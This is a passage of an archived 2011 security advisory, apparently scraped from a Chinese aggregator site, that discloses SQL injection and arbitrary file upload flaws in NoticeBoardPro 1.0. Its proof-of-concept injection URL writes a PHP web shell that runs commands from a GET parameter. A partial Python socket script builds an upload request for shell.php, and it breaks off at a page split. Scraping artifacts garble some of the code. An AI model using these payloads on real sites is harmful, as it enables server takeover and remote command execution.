NoticeBoardPro 1.0 multiple defects and repair-vulnerability warning-the black bar safety net

2011-05-18T00:00:00
ID MYHACK58:62201130511
Type myhack58
Reporter 佚名
Modified 2011-05-18T00:00:00

Description

------------------------------------------------------------------------

Software................ NoticeBoardPro 1.0

Vulnerability........... SQL Injection

Threat Level............ Critical (4/5)

Download................ http://www. NoticeBoardPro. com/

Discovery Date.......... 5/11/2011

Tested On............... Windows Vista + XAMPP

------------------------------------------------------------------------

Author.................. AutoSec Tools

Site.................... http://www. autosectools. com/

Email................... John Leitch <john@autosectools.com>

------------------------------------------------------------------------

--Description--

A sql injection vulnerability in NoticeBoardPro 1.0 can be exploited

to extract arbitrary data. In some environments it may be possible to

create a PHP shell.

--PoC--

http://www.7747.net/noticeboardpro/deleteItem3.php?noticeID=&userID='and%2 0 1=0%20UNION%20SELECT%2 0'%3C? php%20echo%20system($_GET[%22CMD%2 2]);%2 0?% 3E',",",",",",",",",",","%20FROM%20dual%20INTO%20OUTFILE%2 0'../../htdocs/shell.php';%2 3

------------------------------------------------------------------------

Software................ NoticeBoardPro 1.0

Vulnerability........... Arbitrary Upload

Threat Level............ Very Critical (5/5)

Download................ http://www. NoticeBoardPro. com/

Discovery Date.......... 5/11/2011

Tested On............... Windows Vista + XAMPP

------------------------------------------------------------------------

Author.................. AutoSec Tools

Site.................... http://www. autosectools. com/

Email................... John Leitch <john@autosectools.com>

------------------------------------------------------------------------

--Description--

An arbitrary upload vulnerability in NoticeBoardPro 1.0 can be

exploited to upload a PHP shell.

--PoC--

import socket

host = 'www.7747.net'

path = '/noticeboardpro'

shell_path = path + '/photos/shell.php'

port = 8 0

def upload_shell():

s = socket. socket(socket. AF_INET, socket. SOCK_STREAM)

s. connect((host, port))

s. settimeout(8)

s. send('POST' + path + '/editItem1.php HTTP/1.1\r\n'

'Host: www.7747.net\r\n'

'Proxy-Connection: keep-alive\r\n'

'User-Agent: x\r\n'

'Content-Length: 2 5 1\r\n'

'Cache-Control: max-age=0\r\n'

'Origin: null\r\n'

'Content-Type: multipart/form-data; boundary=---- x\r\n'

'Accept: text/html\r\n'

[1] [2] next